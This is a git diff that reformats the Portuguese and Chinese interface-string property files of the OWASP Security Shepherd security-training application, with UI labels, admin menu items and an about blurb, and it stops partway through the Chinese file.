index 0aa0b47a6..f08d9c3dc 100644
--- a/src/main/resources/i18n/text_pt.properties
+++ b/src/main/resources/i18n/text_pt.properties
@@ -1,95 +1,101 @@
-generic.text.aboutSecShep=Sobre Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Desafios
-generic.text.commentMessage.1=Você está navegando na servidor central.
-generic.text.commentMessage.2=Você não vai encontrar nada aqui.
-generic.text.commentMessage.3=Você está procurando para o iframe na página?
-generic.text.commentMessage.4=Você deve tentar uma ferramenta como Firebug para fazer este mais fácil.
-generic.text.configuration=Configuração
-generic.text.configureShepherd=Configurar Security Shepherd
-generic.text.confirmPasswd=Confere Senha
-generic.text.confirmEmailAddr=Confere Email
-generic.text.emailAddr=Email
-generic.text.lessons=Aulas
-generic.text.login=Logar-se
-generic.text.logout=Deslogar
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Registrar
-generic.text.password=Senha
-generic.text.pleaseWait=Esperar por favor
-generic.text.register=Registrar
-generic.text.scoreboard=Placar
-generic.text.searchModules=Busca liçãos
-generic.text.shepherdVersion=Security Shepherd Versão: 3.0
-generic.text.sorryError=Descupla, mas havia um erro
-generic.text.submitResult=Enviar seu chave resultado aqui
-generic.text.submit=Enviar
-generic.text.username=Nome de usuário
-generic.text.welcome=Bem-vindo
-getter.button.completed=Concluído
-getter.button.nextChallenge=Obter próximo desafio
-getter.button.finished=Você terminou
-getter.button.noModulesFound=Não há aulas
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Vamos começar!
-getStarted.button.openLevels.all=Abrir Todos Aulas
-getStarted.button.openLevels.web=Abrir Todos Aulas de Web
-getStarted.button.openLevels.mobile=Abra Todos Aulas de Móvel
-getStarted.button.closeLevels=Fechar Todos Aulas
-blockedMessage.text.heading.levelBlocked=Leção não disponível
-index.link.admin.cheatSheet.manage=Administração de Cheats
-index.link.admin.cheatSheet.manage.create=Criar Novos Cheats
-index.link.admin.cheatSheet.manage.disable=Desativar Cheat
-index.link.admin.cheatSheet.manage.enable=Habilitar Cheats
-index.link.admin.config.change=Mudar o Plano de Aulas
-index.link.admin.config.feedback=Configuração de Comentários
-index.link.admin.config.openClose=Abrir/Fechar Registro
-index.link.admin.config.scoreboard=Configuração de Placar
-index.link.admin.config.coreDb=Configurar o banco de dados
-index.link.admin.moduleManage=Administração de Aulas
-index.link.admin.moduleManage.block=Configurar o Bloco de Aulas
-index.link.admin.moduleManage.openClose=Abrir/Fechar Aulas
-index.link.admin.moduleManage.openCloseCategory=Abrir/Fechar Por Categoria
-index.link.admin.moduleManage.feedback=Ver Comentários
-index.link.admin.moduleManage.progress=Ver Progresso
-index.link.admin.userMange=Administração de Usuários
-index.link.admin.userMange.addPlayer=Adicionar de Jogadores
-index.link.admin.userMange.addPoints=Adicionar / Remover Pontos de Jogadores
-index.link.admin.userMange.assignPlayer=Colocar os Jogadores em uma Classe
-index.link.admin.userMange.createClass=Criar Classe
-index.link.admin.userMange.createAdmin=Criar um Novo Admin
-index.link.admin.userMange.resetPass=Repor Senha
-index.link.admin.userMange.setDefaultPlayerClass=Definir o Normal Jogador Classe
-index.link.admin.userMange.suspendPlayer=Suspender Jodagor
-index.link.admin.userMange.unsuspendPlayer=Desfazer Suspender Jodagor
-index.link.admin.userMange.upgradeToAdmin=Mudar um Jogador de Admin
-login.text.sponsers=Patrocinadores de Security Shepherd
-readyToPlay.title.readyToPlay=Security Shepherd - Pronta?
-readyToPlay.header.notReady=Você não está pronta
-readyToPlay.title.enteredGame=Você está no jogo
-login.text.proxy_question=Você precisa de um Proxy de Internet?
-login.text.download_proxy=Obter um Proxy de Internet aqui.
-login.link.zap_win=ZAP para Windows
-login.link.zap_lin=ZAP para Linux
-login.link.zap_mac=ZAP para Mac
-blockedMessage.text.info.levelBlocked=Você está fazendo muito bem. Bem faeito! Para ajudar os outros jogadores, o admin tenha fechado este aula para algum minutos. Esperar por favor.
-getStarted.text.moduleInfo.openFloor=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
-getStarted.text.moduleInfo.incrementalFloor=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
-getStarted.text.moduleInfo=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para iniçiar um lição, clicar on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
-getStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Sua senha está temporarío. Por favor mudar isso agora.
-login.text.info=Usar seu informação de usuário do Security Shepherd para logar-se
-login.text.regInfo=Registerar uma conta de Security Shepherd aqui!
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refrescar a página! Se esta acontecer de novo; deslogar e logar-se! Se você ainda tem problemas, fala com um admin.
-readyToPlay.text.info.enteredGame=Agora que você pode ver este, você está pronta começar. Começar com algum aulas!
Lembrar, os aulas são sub aplicações. Manter seu jogar nesses lugares! Por favor, não mudar o Session IDs ou você vai deslogar
Também, não esquecer usar um Proxy. Está muito máis fácil
+generic.text.aboutSecShep = Sobre Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Desafios
+generic.text.commentMessage.1 = Você está navegando na servidor central.
+generic.text.commentMessage.2 = Você não vai encontrar nada aqui.
+generic.text.commentMessage.3 = Você está procurando para o iframe na página?
+generic.text.commentMessage.4 = Você deve tentar uma ferramenta como Firebug para fazer este mais fácil.
+generic.text.configuration = Configuração
+generic.text.configureShepherd = Configurar Security Shepherd
+generic.text.confirmPasswd = Confere Senha
+generic.text.confirmEmailAddr = Confere Email
+generic.text.emailAddr = Email
+generic.text.lessons = Aulas
+generic.text.login = Logar-se
+generic.text.logout = Deslogar
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Registrar
+generic.text.password = Senha
+generic.text.pleaseWait = Esperar por favor
+generic.text.register = Registrar
+generic.text.scoreboard = Placar
+generic.text.searchModules = Busca liçãos
+generic.text.shepherdVersion = Security Shepherd Versão: 3.0
+generic.text.sorryError = Descupla, mas havia um erro
+generic.text.submitResult = Enviar seu chave resultado aqui
+generic.text.submit = Enviar
+generic.text.username = Nome de usuário
+generic.text.welcome = Bem-vindo
+
+getter.button.completed = Concluído
+getter.button.nextChallenge = Obter próximo desafio
+getter.button.finished = Você terminou
+getter.button.noModulesFound = Não há aulas
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Vamos começar!
+getStarted.button.openLevels.all = Abrir Todos Aulas
+getStarted.button.openLevels.web = Abrir Todos Aulas de Web
+getStarted.button.openLevels.mobile = Abra Todos Aulas de Móvel
+getStarted.button.closeLevels = Fechar Todos Aulas
+blockedMessage.text.heading.levelBlocked = Leção não disponível
+index.link.admin.cheatSheet.manage = Administração de Cheats
+index.link.admin.cheatSheet.manage.create = Criar Novos Cheats
+index.link.admin.cheatSheet.manage.disable = Desativar Cheat
+index.link.admin.cheatSheet.manage.enable = Habilitar Cheats
+index.link.admin.config.change = Mudar o Plano de Aulas
+index.link.admin.config.feedback = Configuração de Comentários
+index.link.admin.config.openClose = Abrir/Fechar Registro
+index.link.admin.config.scoreboard = Configuração de Placar
+index.link.admin.config.coreDb = Configurar o banco de dados
+index.link.admin.moduleManage = Administração de Aulas
+index.link.admin.moduleManage.block = Configurar o Bloco de Aulas
+index.link.admin.moduleManage.openClose = Abrir/Fechar Aulas
+index.link.admin.moduleManage.openCloseCategory = Abrir/Fechar Por Categoria
+index.link.admin.moduleManage.feedback = Ver Comentários
+index.link.admin.moduleManage.progress = Ver Progresso
+index.link.admin.userMange = Administração de Usuários
+index.link.admin.userMange.addPlayer = Adicionar de Jogadores
+index.link.admin.userMange.addPoints = Adicionar / Remover Pontos de Jogadores
+index.link.admin.userMange.assignPlayer = Colocar os Jogadores em uma Classe
+index.link.admin.userMange.createClass = Criar Classe
+index.link.admin.userMange.createAdmin = Criar um Novo Admin
+index.link.admin.userMange.resetPass = Repor Senha
+index.link.admin.userMange.setDefaultPlayerClass = Definir o Normal Jogador Classe
+index.link.admin.userMange.suspendPlayer = Suspender Jodagor
+index.link.admin.userMange.unsuspendPlayer = Desfazer Suspender Jodagor
+index.link.admin.userMange.upgradeToAdmin = Mudar um Jogador de Admin
+login.text.sponsers = Patrocinadores de Security Shepherd
+readyToPlay.title.readyToPlay = Security Shepherd - Pronta?
+readyToPlay.header.notReady = Você não está pronta
+readyToPlay.title.enteredGame = Você está no jogo
+login.text.proxy_question = Você precisa de um Proxy de Internet?
+login.text.download_proxy = Obter um Proxy de Internet aqui.
+
+
+login.link.zap_win = ZAP para Windows
+login.link.zap_lin = ZAP para Linux
+login.link.zap_mac = ZAP para Mac
+
+
+blockedMessage.text.info.levelBlocked = Você está fazendo muito bem. Bem faeito! Para ajudar os outros jogadores, o admin tenha fechado este aula para algum minutos. Esperar por favor.
+getStarted.text.moduleInfo.openFloor = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
+getStarted.text.moduleInfo.incrementalFloor = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
+getStarted.text.moduleInfo = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para iniçiar um lição, clicar on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
+getStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
+getStarted.text.info.changePassword = Sua senha está temporarío. Por favor mudar isso agora.
+login.text.info = Usar seu informação de usuário do Security Shepherd para logar-se
+login.text.regInfo = Registerar uma conta de Security Shepherd aqui!
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refrescar a página! Se esta acontecer de novo; deslogar e logar-se! Se você ainda tem problemas, fala com um admin.
+readyToPlay.text.info.enteredGame = Agora que você pode ver este, você está pronta começar. Começar com algum aulas!
Lembrar, os aulas são sub aplicações. Manter seu jogar nesses lugares! Por favor, não mudar o Session IDs ou você vai deslogar
Também, não esquecer usar um Proxy. Está muito máis fácil
diff --git a/src/main/resources/i18n/text_zh.properties b/src/main/resources/i18n/text_zh.properties
index 7ae0a781e..f33979090 100644
--- a/src/main/resources/i18n/text_zh.properties
+++ b/src/main/resources/i18n/text_zh.properties
@@ -1,98 +1,104 @@
-generic.text.aboutSecShep=\u5173\u4E8E Security Shepherd
-generic.text.admin=\u7BA1\u7406\u5458
-generic.text.cheat=\u63D0\u793A
-generic.text.challenges=\u6311\u6218
-generic.text.commentMessage.1=You are currently looking at the core server.
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here.
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page.
-generic.text.commentMessage.4=\u4F7F\u7528\u5982 Firebug \u8FD9\u6837\u7684\u5DE5\u5177\u8BA9\u751F\u6D3B\u66F4\u7B80\u5355.
-generic.text.configuration=\u914D\u7F6E
-generic.text.configureShepherd=\u914D\u7F6E Shepherd
-generic.text.confirmPasswd=\u786E\u8BA4\u5BC6\u7801
-generic.text.confirmEmailAddr=\u786E\u8BA4\u90AE\u7BB1\u5730\u5740
-generic.text.emailAddr=\u90AE\u7BB1\u5730\u5740
-generic.text.lessons=\u8BFE\u7A0B
-generic.text.login=\u767B\u5F55
-generic.text.logout=\u6CE8\u9500
-generic.text.loading=\u52A0\u8F7D\u4E2D...
-generic.text.ssRegister=OWASP Security Shepherd - \u6CE8\u518C
-generic.text.password=\u5BC6\u7801
-generic.text.pleaseWait=\u8BF7\u7A0D\u4FAF!
-generic.text.register=\u6CE8\u518C
-generic.text.scoreboard=\u8BB0\u5206\u677F
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd \u7248\u672C: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=\u5728\u8FD9\u63D0\u4EA4\u7ED3\u679C\u94A5\u5319
-generic.text.submit=\u63D0\u4EA4
-generic.text.username=\u7528\u6237\u540D
-generic.text.welcome=\u6B22\u8FCE
-getter.button.completed=\u5B8C\u6210
-getter.button.nextChallenge=\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218
-getter.button.finished=\u4F60\u5DF2\u7ECF\u5B8C\u6210!
-getter.button.noModulesFound=\u6CA1\u6709\u677F\u5757
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=\u8BA9\u6211\u4EEC\u5F00\u59CB\u5427
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-login.text.sponsers=Project Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - \u51C6\u5907\u597D\u4E86\u5417?
-readyToPlay.header.notReady=\u8FD8\u6CA1\u51C6\u5907\u597D!
-readyToPlay.title.enteredGame=\u5DF2\u7ECF\u8FDB\u5165\u6E38\u620F!
-login.text.proxy_question=\u4F60\u9700\u8981\u4EE3\u7406\u5417?
-login.text.download_proxy=\u4E0B\u8F7D \u4E00\u4E2A HTTP \u4EE3\u7406
-login.link.zap_win=ZAP Windows \u7248
-login.link.zap_lin=ZAP Linux \u7248
-login.link.zap_mac=ZAP Mac \u7248
-blockedMessage.text.info.levelBlocked=\u4F60\u505A\u7684\u975E\u5E38\u597D! \u7BA1\u7406\u5458\u5F53\u524D\u5DF2\u5C06\u8FD9\u4E2A\u7EA7\u522B\u6807\u8BB0\u4E3A\u5173\u95ED\u72B6\u6001. \u8981\u4E86\u89E3\u8BE5\u7EA7\u522B\u4F55\u65F6\u518D\u5F00\u653E,\u4F60\u9700\u8981\u5411\u8BE5\u7A0B\u5E8F\u7684\u8D1F\u8D23\u4EBA\u8BE2\u95EE!
-getStarted.text.moduleInfo.openFloor=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u5355\u51FB\u5217\u8868\u5934,\u8BFE\u7A0B \u6216 \u6A21\u5757, \u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!
-getStarted.text.moduleInfo.incrementalFloor=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6311\u6218\u5F00\u59CB\u5427!\u4ECE\u70B9\u51FB\u9760\u5DE6\u8FB9\u7684'\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218'\u6309\u952E\u5F00\u59CB!
-getStarted.text.moduleInfo=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u70B9\u51FB\u5217\u8868\u5934\u73B0\u573A\u57F9\u8BAD\u6216Corporal,\u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!\u5728\u5DE6\u4FA7\u5217\u8868\u7684\u6A21\u5757\u4E2D,\u8D8A\u5F80\u4E0B\u7684\u6A21\u5757\u503C\u8D8A\u591A\u7684\u5206\u6570!
-ggetStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
-login.text.info=\u7528\u4F60\u7684 Security Shepherd \u8BC1\u4E66 \u767B\u5F55.
-login.text.regInfo=\u6CE8\u518C\u4E00\u4E2A Security Shepherd \u5E10\u6237!
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=OWASP Security Shepherd \u9879\u76EE\u7684\u5168\u7EC4\u4EBA\u5458\u7531\u8877\u7684\u611F\u8C22\u8D5E\u52A9\u5546\u4EEC\u7684\u5927\u529B\u652F\u6301\u002C\u8BF7\u901A\u8FC7\u67E5\u770B\u4ED6\u4EEC\u7684\u7F51\u7AD9\u548C Twitter \u6765\u5173\u6CE8\u4ED6\u4EEC\u002E.
-login.text.thanks=OWASP Security Shepherd \u9879\u76EE\u7EC4\u8FD8\u8981\u7279\u522B\u611F\u8C22\u5B89\u4E1C\u5C3C\u00B7\u57FA\u6069\u535A\u58EB\u548C\u7231\u5C14\u5170\u5E03\u5170\u5BDF\u7406\u5DE5\u5B66\u9662\u5B89\u5168\u7814\u7A76\u9662\u7684\u652F\u6301" https://owasp.securityShepherd.eu.
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
If you havn't already configured a web proxy, you better! It makes things much easier!
+generic.text.aboutSecShep =\u5173\u4E8E Security Shepherd
+generic.text.admin = \u7BA1\u7406\u5458
+generic.text.cheat = \u63D0\u793A
+generic.text.challenges = \u6311\u6218
+generic.text.commentMessage.1 = You are currently looking at the core server.
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here.
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page.
+generic.text.commentMessage.4 = \u4F7F\u7528\u5982 Firebug \u8FD9\u6837\u7684\u5DE5\u5177\u8BA9\u751F\u6D3B\u66F4\u7B80\u5355.
+generic.text.configuration = \u914D\u7F6E
+generic.text.configureShepherd = \u914D\u7F6E Shepherd
+generic.text.confirmPasswd = \u786E\u8BA4\u5BC6\u7801
+generic.text.confirmEmailAddr = \u786E\u8BA4\u90AE\u7BB1\u5730\u5740
+generic.text.emailAddr = \u90AE\u7BB1\u5730\u5740
+generic.text.lessons = \u8BFE\u7A0B
+generic.text.login = \u767B\u5F55
+generic.text.logout = \u6CE8\u9500
+generic.text.loading = \u52A0\u8F7D\u4E2D...
+generic.text.ssRegister = OWASP Security Shepherd - \u6CE8\u518C
+generic.text.password = \u5BC6\u7801
+generic.text.pleaseWait = \u8BF7\u7A0D\u4FAF!
+generic.text.register = \u6CE8\u518C
+generic.text.scoreboard = \u8BB0\u5206\u677F
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd \u7248\u672C: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = \u5728\u8FD9\u63D0\u4EA4\u7ED3\u679C\u94A5\u5319
+generic.text.submit = \u63D0\u4EA4
+generic.text.username = \u7528\u6237\u540D
+generic.text.welcome = \u6B22\u8FCE
+
+getter.button.completed = \u5B8C\u6210
+getter.button.nextChallenge = \u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218
+getter.button.finished = \u4F60\u5DF2\u7ECF\u5B8C\u6210!
+getter.button.noModulesFound = \u6CA1\u6709\u677F\u5757
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = \u8BA9\u6211\u4EEC\u5F00\u59CB\u5427
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+login.text.sponsers = Project Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - \u51C6\u5907\u597D\u4E86\u5417?
+readyToPlay.header.notReady = \u8FD8\u6CA1\u51C6\u5907\u597D!
+readyToPlay.title.enteredGame = \u5DF2\u7ECF\u8FDB\u5165\u6E38\u620F!
+login.text.proxy_question = \u4F60\u9700\u8981\u4EE3\u7406\u5417?
+login.text.download_proxy = \u4E0B\u8F7D \u4E00\u4E2A HTTP \u4EE3\u7406
+
+
+login.link.zap_win = ZAP Windows \u7248
+login.link.zap_lin = ZAP Linux \u7248
+login.link.zap_mac = ZAP Mac \u7248
+
+
+blockedMessage.text.info.levelBlocked = \u4F60\u505A\u7684\u975E\u5E38\u597D! \u7BA1\u7406\u5458\u5F53\u524D\u5DF2\u5C06\u8FD9\u4E2A\u7EA7\u522B\u6807\u8BB0\u4E3A\u5173\u95ED\u72B6\u6001. \u8981\u4E86\u89E3\u8BE5\u7EA7\u522B\u4F55\u65F6\u518D\u5F00\u653E,\u4F60\u9700\u8981\u5411\u8BE5\u7A0B\u5E8F\u7684\u8D1F\u8D23\u4EBA\u8BE2\u95EE!
+getStarted.text.moduleInfo.openFloor = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u5355\u51FB\u5217\u8868\u5934,\u8BFE\u7A0B \u6216 \u6A21\u5757, \u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!
+getStarted.text.moduleInfo.incrementalFloor = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6311\u6218\u5F00\u59CB\u5427!\u4ECE\u70B9\u51FB\u9760\u5DE6\u8FB9\u7684'\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218'\u6309\u952E\u5F00\u59CB!
+getStarted.text.moduleInfo = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u70B9\u51FB\u5217\u8868\u5934\u73B0\u573A\u57F9\u8BAD\u6216Corporal,\u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!\u5728\u5DE6\u4FA7\u5217\u8868\u7684\u6A21\u5757\u4E2D,\u8D8A\u5F80\u4E0B\u7684\u6A21\u5757\u503C\u8D8A\u591A\u7684\u5206\u6570!
+ggetStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
